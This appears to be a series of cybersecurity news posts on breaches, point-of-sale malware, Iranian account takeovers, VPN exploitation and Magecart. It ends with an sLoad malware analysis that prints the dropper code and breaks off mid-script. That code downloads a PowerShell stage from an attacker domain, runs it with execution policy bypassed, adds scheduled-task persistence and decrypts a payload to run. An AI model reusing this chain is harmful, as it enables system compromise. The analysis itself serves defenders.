“In approximately June 2016, the real estate website StreetEasy suffered a data breach. In total, 988k unique email addresses were included in the breach alongside names, usernames and SHA-1 hashes of passwords, all of which appeared for sale on a dark web marketplace in February 2019. The data was provided to HIBP by a source who requested it be attributed to “JimScott.Sec@protonmail.com”.” reads HIBP.

HIBP also included data from a breach suffered by Sephora Southeast Asia in January 2017 that exposed data for 780,073 customers, including customers’ dates of birth, email addresses, ethnicities, genders, names, and physical attributes.

“In approximately January 2017, the beauty store Sephora suffered a data breach. Impacting customers in South East Asia, Australia and New Zealand, 780k unique email addresses were included in the breach alongside names, genders, dates of birth, ethnicities and other personal information. The data was provided to HIBP by a source who requested it be attributed to “JimScott.Sec@protonmail.com”.” reads HIBP.

Data from the Sephora breach has also been seen for sale on hacker forums.

Users impacted by the breaches should change their passwords, including on every other site where they reused the same credentials.

PoS malware infections impacted four restaurant chains in the U.S.

Four restaurant chains in the U.S. disclosed payment card theft via PoS malware that took place over the summer.

Four restaurant chains in the United States disclosed security breaches that impacted their payment systems over the summer; crooks used PoS malware to steal customers’ payment card data.

The restaurant chains are McAlister’s Deli, Moe’s Southwest Grill, Schlotzsky’s, and Hy-Vee; all four confirmed the presence of PoS malware at certain locations.

Moe’s, McAlister’s and Schlotzsky’s are owned by Focus Brands; the fact that they simultaneously disclosed the payment card breaches suggests that attackers were able to compromise infrastructure shared by the three restaurant chains.

The three restaurant chains confirmed that hackers compromised the payment systems in a period between April 29, 2019 and July 22, 2019. 

“A thorough investigation is being conducted and is nearly complete. It appears that unauthorized code designed to copy payment card data from cards used in person was installed in certain corporate and franchised restaurants at different times over the general period of April 29, 2019 to July 22, 2019.” reads an excerpt of a data breach notification published by the three brands.

Only Schlotzsky’s reported that the attacks began on April 11, 2019; the other two confirmed that the attacks started on April 29.

The three restaurant chains reported that the PoS malware was discovered only at certain locations, and at most locations it was present for only a few weeks in July.

The brands did not reveal the number of impacted customers.

Customers were initially alerted about the incident on August 20, when the restaurant chains were investigating the security incidents.

The PoS malware was designed to capture data from the magnetic stripe of a payment card during the payment process, including the card number, expiration date, and internal verification code, and sometimes the cardholder name.

The fourth brand that suffered a payment card breach is Hy-Vee, the restaurant chain provided an update to the notice of payment card data incident released on August 14.

The company confirmed that on July 29 crooks compromised some payment processing systems; in this case, the PoS malware remained active for more than a month.

The update provided by the company revealed that infections at the fuel pumps began on December 14, 2018, while payment systems at restaurants and drive-thru coffee shops were infected starting January 15.

“The specific timeframes when data from cards used at these locations involved may have been accessed vary by location over the general timeframe beginning December 14, 2018, to July 29, 2019 for fuel pumps and beginning January 15, 2019, to July 29, 2019, for restaurants and drive-thru coffee shops.” reads the update provided by the company. “There are six locations where access to card data may have started as early as November 9, 2018, and one location where access to card data may have continued through August 2, 2019.”

The company also published a Location Look Up Tool to determine the Hy-Vee impacted locations.

Iran-linked Phosphorus group hit a 2020 presidential campaign

Microsoft says that the Iran-linked cyber-espionage group tracked as Phosphorus (aka APT35, Charming Kitten, Newscaster, and Ajax Security Team) targeted a 2020 presidential campaign.

Microsoft’s Threat Intelligence Center (MSTIC) revealed that an Iran-linked APT group tracked as Phosphorus (aka APT35, Charming Kitten, Newscaster, and Ajax Security Team) attempted to access email accounts belonging to current and former US government officials, journalists, Iranians living abroad, and individuals involved in a 2020 US presidential campaign.

The Phosphorus group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011. 

The experts revealed that the recent campaign carried out by the APT group took place between August and September.

“In a 30-day period between August and September, the Microsoft Threat Intelligence Center (MSTIC) observed Phosphorus making more than 2,700 attempts to identify consumer email accounts belonging to specific Microsoft customers and then attack 241 of those accounts.” reads the analysis published by Microsoft. “The targeted accounts are associated with a U.S. presidential campaign, current and former U.S. government officials, journalists covering global politics and prominent Iranians living outside Iran.”

The state-sponsored hackers initially conducted a reconnaissance operation to identify high-value targets. Microsoft observed more than 2,700 probes, then the attackers targeted 241 accounts, some of them associated with a U.S. Presidential campaign.

Microsoft confirmed that hackers breached four accounts, but the compromised accounts were not associated with the U.S. Presidential campaign or current and former U.S. government officials.

Microsoft notified all the impacted users about the hacks and provided support to the victims to secure their accounts.

The hackers first broke into the secondary email inbox linked to a victim’s Microsoft account, then used it to request a password reset. Once the reset link arrived in the secondary inbox, they used it to take control of the primary Microsoft account.

“Phosphorus used information gathered from researching their targets or other means to game password reset or account recovery features and attempt to take over some targeted accounts.” continues the report. “For example, they would seek access to a secondary email account linked to a user’s Microsoft account, then attempt to gain access to a user’s Microsoft account through verification sent to the secondary account. In some instances, they gathered phone numbers belonging to their targets and used them to assist in authenticating password resets.”

Microsoft experts pointed out that the attacks attributed to the Phosphorus group, while not technically sophisticated, used a significant amount of personal information to identify the targets’ accounts and hijack them.

Microsoft recommends that its high-profile customers involved in political campaigns, think tanks, or NGOs sign up for Microsoft AccountGuard, which offers additional protection against such attacks.

“There are currently 60,000 accounts in 26 countries protected by AccountGuard, which provides monitoring and unified threat notification across the Office 365 accounts you use for work and the personal accounts of your staff and others affiliated with your organization that opt-in for this protection.” concludes Microsoft. “To date, we’ve made more than 800 notifications of attempted nation-state attacks to AccountGuard customers.”

In March, Microsoft announced that it had taken control of 99 domains used by an Iran-linked APT group tracked by the company as Phosphorus.

The domains attempted to mimic legitimate services belonging to Microsoft and other legitimate online services, such as LinkedIn and Yahoo. The list of seized domains includes verification-live.com, outlook-verify.net, myaccount-services.net, verify-linkedin.net, and yahoo-verify.net.

The threat actors used the websites to serve malware to the victims; they also sent out emails alerting recipients of a security risk in order to trick them into handing over their account credentials.

Security Affairs newsletter Round 234

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs.

Hi folks, let me inform you that I have suspended the newsletter service; anyway, I’ll continue to provide you with a list of published posts every week through the blog.

Once again thank you!

Hacker claims to have stolen over 218M Zynga ‘Words with Friends’ gamers’ records

Masad Stealer Malware exfiltrates data via Telegram

Phishers continue to abuse Adobe and Google Open Redirects

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

A new critical flaw in Exim exposes email servers to remote attacks

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

eGobbler’s malvertising campaign hijacked over 1 billion ad impressions

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/AirDropBot

Iran’s oil minister orders ‘Full Alert’ for oil sector against attacks

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

A new Adwind variant involved in attacks on US petroleum industry

Danish company Demant expects to incur losses of up to $95 Million after cyber attack

Frequent VBA Macros used in Office Malware

Gucci IOT Bot Discovered Targeting European Region

Hackers breached one of Comodo Forums, 245,000 users impacted

Singapore presented the Operational Technology (OT) Cybersecurity Masterplan

Teheran: U.S. has started ‘Cyber War’ against Iran

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Asics apologizes after pornography ran on screens at central store in Auckland for hours

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Experts found 20 Million tax records for Russian citizens exposed online

Former American Express employee under investigation for customers’ data abuse

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

Zendesk 2016 security breach may impact Uber, Slack, and other organizations

6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Dutch police shut down bulletproof service hosting tens of DDoS botnets

FBI warns about high-impact Ransomware attacks on U.S. Organizations

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

Egypt regularly spies on opponents and activists with mobile apps

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

The sLoad Threat: Ten Months Later

Magecart hackers are expanding their operations

NSA Launches New Cybersecurity Directorate

UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities

The UK’s National Cyber Security Centre (NCSC) warns of attacks exploiting recently disclosed VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure products.

According to the UK’s National Cyber Security Centre (NCSC), advanced persistent threat (APT) groups have been exploiting recently disclosed vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure products to break into target networks.

This week the NCSC issued an alert to warn organizations using the vulnerable products.

“The NCSC is investigating the exploitation, by Advanced Persistent Threat (APT) actors, of known vulnerabilities affecting Virtual Private Network (VPN) products from vendors Pulse Secure, Palo Alto and Fortinet.” reads the alert issued by the NCSC.

“This activity is ongoing, targeting both UK and international organisations. Affected sectors include government, military, academic, business and healthcare.”

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379 in Fortinet FortiOS.

CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that could be exploited by an unauthenticated attacker to download FortiOS system files. The flaw could be exploited to obtain administrator credentials in plain text.

CVE-2019-11510 in Pulse Connect Secure is a critical arbitrary file read vulnerability.

APT groups also exploit CVE-2018-13382, CVE-2018-13383, and CVE-2019-1579 in Palo Alto Networks products.

The vulnerabilities were first reported in July by researchers Orange Tsai and Meh Chang from DEVCORE, who found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents.

“Users of these VPN products should investigate their logs for evidence of compromise, especially if it is possible that patches were not applied immediately after their release.” reads the alert.

“Apart from specific product advice below, administrators should also look for evidence of compromised accounts in active use, such as anomalous IP locations or times. Snort rules are available in open source, but may not pick up events for exploits over HTTPS.” concludes the NCSC.
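The NCSC’s fallback advice, since network signatures miss exploitation over HTTPS, is to look for compromised accounts in active use through anomalous IP locations or logon times. The following is an added example, not NCSC code or any vendor’s: a small detector run over constructed, vendor-neutral VPN authentication records that flags a successful logon from two countries within a short window and logons outside a working-hours window. The log format, the two-hour window and the 06:00-20:00 UTC working hours are assumptions to be tuned to a real deployment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Tuple

# Constructed sample records (not any VPN product's real syslog format). Addresses
# are from documentation ranges; the country codes are part of the constructed data.
SAMPLE_LOG = """\
2019-10-01T08:55:12Z user=alice src=198.51.100.23 country=GB result=success
2019-10-01T09:20:41Z user=alice src=203.0.113.77 country=RU result=success
2019-10-01T03:02:09Z user=bob src=198.51.100.40 country=GB result=success
2019-10-01T10:15:00Z user=carol src=198.51.100.55 country=GB result=success
2019-10-01T10:16:30Z user=carol src=198.51.100.55 country=GB result=failure
2019-10-02T09:05:00Z user=alice src=198.51.100.23 country=GB result=success
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) user=(?P<user>\S+) "
    r"src=(?P<src>\S+) country=(?P<cc>[A-Z]{2}) result=(?P<result>\w+)$"
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one record into a dict with a timezone-aware UTC timestamp, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(
        tzinfo=timezone.utc
    )
    return event


def find_anomalies(log_text: str,
                   travel_window: timedelta = timedelta(hours=2),
                   work_hours: Tuple[int, int] = (6, 20)) -> List[Tuple[str, str, str]]:
    """Return (user, kind, detail) alerts for successful logons.

    kind == "location": two consecutive successes for the same account from
    different countries closer together than travel_window.
    kind == "time": a success whose UTC hour falls outside [start, end) work_hours.
    Failed attempts are ignored here; they belong to a brute-force detector."""
    successes = [e for e in map(parse_line, log_text.splitlines())
                 if e and e["result"] == "success"]
    successes.sort(key=lambda e: e["ts"])
    by_user: Dict[str, List[dict]] = defaultdict(list)
    for e in successes:
        by_user[e["user"]].append(e)

    alerts: List[Tuple[str, str, str]] = []
    for user, events in by_user.items():
        for prev, cur in zip(events, events[1:]):
            gap = cur["ts"] - prev["ts"]
            if prev["cc"] != cur["cc"] and gap <= travel_window:
                alerts.append((user, "location",
                               f"{prev['cc']} ({prev['src']}) -> {cur['cc']} "
                               f"({cur['src']}) within {gap}"))
        for e in events:
            if not work_hours[0] <= e["ts"].hour < work_hours[1]:
                alerts.append((user, "time",
                               f"logon at {e['ts'].isoformat()} from {e['src']}"))
    return alerts


if __name__ == "__main__":
    for user, kind, detail in find_anomalies(SAMPLE_LOG):
        print(f"{kind:8} {user:6} {detail}")
```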

Hacker is auctioning a database containing details of 92 million Brazilians

A database containing details of 92 million Brazilians was auctioned by a threat actor on underground forums along with a search service focused on Brazilians.

Someone is auctioning on several restricted underground forums a database containing the personal information of 92 million Brazilian citizens. The threat actor, who uses the handle X4Crow, is also advertising a search service that allows retrieving detailed information on Brazilian citizens.

Image source: Bleeping Computer

The records are arranged per province; they include names, dates of birth and taxpayer IDs (CPF, Cadastro de Pessoas Físicas), as well as taxpayer details of legal entities (CNPJ, Cadastro Nacional da Pessoa Jurídica).

The starting price to participate in the auction is $15,000, and participants can raise the price by 110 each time.

“A post on one of the forums seen by BleepingComputer informs that the database is 16GB large, in SQL format. The starting price for the auction is $15,000 with a step up bid of $1,000.” reported Bleeping computer.

According to BleepingComputer, which received a sample of the database, the data is authentic.

At the time of writing, it seems that the seller has not received any bid.

X4Crow also advertises a search service that allows retrieving detailed information on Brazilians (i.e. email address, profession, education level, possible relatives, neighbors, license plates, vehicle, ID card, driver’s license) simply by providing a full name, taxpayer ID, or phone number.

“There is no guarantee that all the details will be retrieved for all individuals but the report may provide, on average, 80% of the specifics listed above.” continues BleepingComputer.

Querying the service to retrieve data on a specific company and its corporate structure could cost up to $150.

According to BleepingComputer, X4Crow is considered a reliable actor in the cybercrime underground even though it has not been operating for long.

Pierluigi Paganini

(SecurityAffairs – Brazilians, cybercrime)

The post Hacker is auctioning a database containing details of 92 million Brazilians appeared first on Security Affairs.

Magecart hackers are expanding their operations

Cybercrime gangs under the Magecart umbrella continue to compromise e-commerce platforms to steal payment card data from users worldwide.

Hacker groups under the Magecart umbrella continue to target organizations’ payment card data with so-called software skimmers. Security firms have monitored the activities of at least a dozen groups since 2010.

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, MyPillow and Amerisleep, and Feedify.

Millions of Magecart instances have been detected over time, and security experts have identified tens of distinct software skimming scripts.

In a report recently published by RiskIQ, experts estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

“Suppliers can include vendors that integrate with sites to add or improve site functionality or cloud resources from which websites pull code, such as Amazon S3 Buckets. These third-parties integrate with thousands of websites” states the report.

The Magecart group tracked as MG5 (Group 5) appears to be the most sophisticated and prolific. MG5 focuses on supply chain attacks and is responsible for the hack of hundreds of websites and providers such as SociaPlus and Inbenta.

In June, the gang made the headlines again after infecting over 17,000 domains by targeting improperly secured Amazon S3 buckets.

Recently, IBM researchers observed the MG5 group using malicious code designed to be injected into commercial-grade layer 7 (L7) routers.

According to RiskIQ, many groups under the umbrella still focus on e-commerce sites powered by the Magento or OpenCart shopping platforms.


Following a consolidated attack pattern that is common in the hacking community, Magecart groups attempt to exploit vulnerabilities that victims have yet to patch even though security updates have been released by Magento and other software vendors.

Attackers also look for new attack vectors to distribute their software skimmers, such as compromising creative ad script tags to leverage digital ad networks to generate traffic to their skimmers and hit thousands of sites at once.

The RiskIQ report revealed that 17% of all malicious advertisements it analyzed are associated with Magecart groups.

Other interesting insights included in the report:

  • 17% of all Malvertisements detected by RiskIQ contain Magecart skimmers
  • The average length of a Magecart breach is 22 days with many lasting years, or even indefinitely.
  • Shopping platforms such as Magento and OpenCart are the lifeblood of many Magecart groups. RiskIQ has detected 9,688 vulnerable Magento hosts.
  • Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 
  • Because Magecart skimmers stay on websites for so long, threat actors are purchasing Magecart infrastructure that’s gone offline to assume access to these breached sites. 

The full report, containing additional insights and information, is available for download here: https://www.riskiq.com/research/magecart-growing-threat/

Pierluigi Paganini

(SecurityAffairs – software skimmers, hacking)

The post Magecart hackers are expanding their operations appeared first on Security Affairs.

NSA Launches New Cybersecurity Directorate

NSA is redefining its cybersecurity mission and with the Cybersecurity Directorate it will enhance its partnerships with unclassified collaboration and information sharing.

Under the new Cybersecurity Directorate — a major organization that unifies NSA’s foreign intelligence and cyberdefense missions


The NSA announced the new Cybersecurity Directorate — which will help defend domestic organizations from foreign cyberattacks — in a short press release. The NSA, sometimes called by its nickname, “No Such Agency,” is known for being secretive. But this new directorate seems to signal a pivot towards a more public approach to security than the Agency has taken in the past.


The directorate also reflects a change in the importance of national cybersecurity and provides a hint as to how government agencies are rethinking how cybersecurity divisions should be organized.

The NSA Makes Cyberdefense a Top Priority

The directorate will unify the NSA’s current foreign intelligence and cyberdefense operations, bringing them together in a “major organization” designed to defend domestic organizations against foreign cyberattacks. The NSA expects the directorate to “reinvigorate NSA’s white hat mission” by seeing the Agency turn towards providing partners and “customers” with threat information, and by otherwise equipping them against cyberattacks.

The directorate will have the NSA turn its efforts towards military and defense industry security. A short, NSA-produced video at the end of the press release provided more information about the threats the NSA expects to defend the public from — including attacks on infrastructure, theft of classified information, and “mass deception of the public.”

The pivot comes at a time where the nation is facing several security crises and reasonable fears that almost anything that runs on a computer — banks, voting machines, and critical infrastructure — can be compromised or damaged by cyberattacks.

The launch of the new directorate — and the focus of the press release on cyberdefense — follows comments made by Glenn Gerstell, chief counsel of the NSA, back in September. At that time, Gerstell said that the NSA wouldn’t “hack back” in the case of a cyberattack and that the Agency was instead focused on defending key information and infrastructure from theft or damage by foreign actors.

The directorate is not the Agency’s first foray into providing private domestic organizations with intel about foreign hackers. In 2011, as the financial sector was still recovering from the financial crisis of 2008, the Agency began providing Wall Street banks with cybersecurity information in the hopes that it would prevent “financial sabotage.”

The State of Cybersecurity

The directorate reflects a broader change that’s also being seen in the private sector. Cybersecurity is no longer seen as a sub-component of an overall security plan, or as part of the tech department, but as a necessary investment that requires top talent and serious commitment of resources. Networks are more likely to be considered vulnerable and need better defense from cyberattacks.

Businesses are increasingly relying on Internet of Things or “smart” devices to provide data. But these devices are often improperly secured and provide an access point into secure networks and the valuable information held there. As the world becomes more connected, there are more opportunities for hackers to slip through the cracks of cyberdefenses and do damage once they have access to secure networks.

In the press release, the NSA said that the Agency will “invest in and rely on its expert workforce.” It’s not clear right now if the new directorate will result in the NSA expanding its cybersecurity workforce. If so, they may run into some of the problems faced by the private sector, in that the number of cybersecurity experts has not kept pace with the frequency of, intensity of, and damage done by cyberattacks.

What the NSA’s Directorate Means for Cybersecurity

The new directorate shows that cybersecurity is a higher priority than ever for the Agency, and signals a turn to more public involvement in national security. Time will tell how effective the directorate is at preventing or reducing the harm of cyberattacks, but the defense industry is likely happy to receive any help it can get.

Going forward, cybersecurity will continue to become more important as critical infrastructure and essential components of our economy and national defense become more connected. Whether or not the cybersecurity industry will be able to keep up with the rising pace of attacks remains to be seen.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, NSA Cybersecurity Directorate)

The post NSA Launches New Cybersecurity Directorate appeared first on Security Affairs.

The sLoad Threat: Ten Months Later

Since September 2018, SLoad (tracked as TH-163) has been the protagonist of an increasing and persistent wave of attacks against Italian organizations.

Introduction

SLoad (TH-163) has been the protagonist of increasing and persistent attack waves against the Italian panorama since Q3 2018 and throughout 2019 (e.g. N020419, N040619, N010819), but also against the UK and Canada as reported by Proofpoint. Ten months ago, we wrote about the complex infection chain the sLoad malware threat was using during its attack campaigns, and today we look at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operation, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain used to spread additional malware. For this reason Cybaze-Yoroi ZLAB dissected one of the latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legitimate certified emails (PEC). These recent attack waves were targeting Italian organizations and consultants affiliated with professional associations, such as lawyers and civil engineers. Once again the attachment is a malicious zip.

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such as the one appended to the archive in past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first one is designed to deceive the unaware user and push them to open the runnable script.

The following tables show some basic information about the samples contained in the zip archive.

  Hash: 30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
  Threat: .vbs dropper
  Brief Description: Sload visual basic script loader
  Ssdeep: 192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

  Hash: 43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
  Threat: .pdf file
  Brief Description: Sload corrupted pdf file
  Ssdeep: 1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the vbs dropper, it is possible to see an obfuscated script containing several junk instructions such as unused variables and commented-out code. After a deobfuscation phase the inner logic becomes visible. The purpose of this script is to launch a powershell script retrieved from the attacker infrastructure and, in the meantime, decoy the victim.

  On Error Resume Next
  Set ZCzG = CreateObject("Scripting.FileSystemObject")
  Set PavfQt = WScript.CreateObject ("WScript.Shell")
  Set XaiX = ZCzG.GetFolder("c:\Users\")
  ' Decoy: open every .pdf found under C:\Users while the download runs
  Recurse(XaiX)
  ' Stage 2 is fetched with the native bitsadmin tool, disguised as a .jpg
  PavfQt.run "bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1",0,True
  i=0
  ' Poll roughly every 2.3 seconds until the downloaded script exists
  Do While i < 1
    If (ZCzG.FileExists("c:\Users\Public\Downloads\RSbYHuPO.ps1")) Then
      i=1
    End If
    WScript.Sleep(2280)
  Loop
  PavfQt.run "powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 ",0,True
  Sub Recurse(JFLY)
    If IsAccessible(JFLY) Then
      For Each oSubFolder In JFLY.SubFolders
        Recurse oSubFolder
      Next
      For Each RIst In JFLY.Files
        If InStr(RIst.Name,".pdf") > 0 Then
          PavfQt.run "explorer "+JFLY+"\"+RIst.Name
        End if
      Next
    End If
  End Sub
  Function IsAccessible(XaiX)
    On Error Resume Next
    IsAccessible = (XaiX.SubFolders.Count >= 0)
  End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the native “bitsadmin.exe” tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The use of native tools allows the script to operate under the radar, evading several AV controls. The fake jpg actually contains a powershell script.

  $oLZz2= "C:\Users\admin\AppData\Roaming";
  $YwbpkcN9XUIv1w=@(1..16);
  […]
  # Encrypted configuration files embedded in the script (see below)
  $main_ini='76492d1116743f0423413b16050a5345MgB8ADUAVAB4 […] AMQAyAGYA';
  $main_ini | out-file $PaIQGLoo'\main.ini';
  $domain_ini='76492d1116743f0423413b1605 […] YwBlAA==';
  $domain_ini | out-file $PaIQGLoo'\domain.ini';
  […]
  # Body of the <random_name>.ps1 stage, written to disk as a script block
  try{ […]
  }catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  if ($yC0iBerAupzdtf5Z.length -lt 2){
  $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
  $r=8;
  $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
  # Decryption key: the sequential integer array 1..16
  $sv8eJJhgWV3xAN7Uu=@(1..16);
  $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
  $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  Invoke-Expression $DBR4S3t;
  }
  } | out-file $PaIQGLoo'\'$H3z9RnzIihO8'.ps1'
  # Persistence: scheduled task running the .tmp VBScript every 3 minutes
  $OFHc0H4A=' /F /create /sc minute /mo 3 /TN "S'+$rs+$fLCg9ngJqRHX36hfUr+'" /ST 07:00 /TR "wscript /E:vbscript '+$PaIQGLoo+'\'+$JxdRWnHC+'.tmp"';
  start-process -windowstyle hidden schtasks $OFHc0H4A; […]

Code snippet 2: Downloaded powershell code

The first action the script takes is to set a scheduled task to gain persistence on the infected machine. Then, after selecting a random active process on the infected machine (“System” in this specific infection) and concatenating it with the “%AppData%\Roaming” path, it stores four different files in its installation folder.

  • <random_name>.tmp
  • <random_name>.ps1
  • domain.ini
  • main.ini

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”) are encrypted using the “ConvertFrom-SecureString” native function. Then, the script runs the “UoqOTQrc.tmp” file, whose only purpose is to execute the “UoqOTQrc.ps1” file contained in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”

  Dim str, min, max
  Const LETTERS = "abcdefghijklmnopqrstuvwxyz"
  min = 1
  max = Len(LETTERS)
  Randomize
  […]
  Set objFSO=CreateObject("Scripting.FileSystemObject")
  Set winssh = WScript.CreateObject ("WScript.Shell")
  fName=RandomString(10)
  JAcalshy=RandomString(4)
  fZgxNPDMnu=RandomString(4)
  WEHxctVdTEoDfqEqJMP=RandomString(4)
  […]
  Set objFile = objFSO.CreateTextFile(outFile,8, True)
  objFile.Write "Set "+JAcalshy+"=rshe" & vbCrLf
  objFile.Write "Set "+fZgxNPDMnu+"=ypa" & vbCrLf
  objFile.Write "Set "+WEHxctVdTEoDfqEqJMP+"=il" & vbCrLf
  objFile.Close
  winssh.run "powershell -ep bypass -file .ps1",0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

  try{
  Remove-EventLog:Debug-Job
  Export-BinaryMiLog:Get-PSSessionConfiguration
  Remove-JobTrigger:New-Item
  }catch{
  $yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  if ($yC0iBerAupzdtf5Z.length -lt 2){
  $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
  $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
  $sv8eJJhgWV3xAN7Uu=@(1..16);
  $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
  $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  Invoke-Expression $DBR4S3t;
  }

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “main.ini” file using the “ConvertFrom-SecureString” function and the encryption key contained in the “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array.

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated by selecting three ASCII char-codes in the ranges [65-90] and [67-122]. Then, it decrypts “domain.ini” using the key in the “$main_key” variable and, in the end, saves the results in the “btc.log” file. Continuing the analysis of “main.ini”, it is possible to spot that the script also grabs system information to check in the newly infected host.

Figure 5: “domain.ini” file before and after decryption
Figure 6: Some information exfiltrate by the malware before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

  $u2K2MQ4 = "`r`n"
  $lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
  $yIXgWSaXsKD5hanf9uO= $env:userprofile+'\App'+'Da'+'ta\Ro'+'am'+'ing';
  $hh='hi'+'dd'+'en';
  $ixXApGeqJKEGY=@(1..16);
  $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  $Erlydj = $Erlydjiyy.UUID;
  $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
  If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";
  try{ Remove-Item $Z5lTNXB'\*'}catch{}
  $wsxDITPgQCH+='76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA';
  […]
  $wsxDITPgQCH+='UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA';
  $wsxDITPgQCH+='3ADAANQA1AA==';
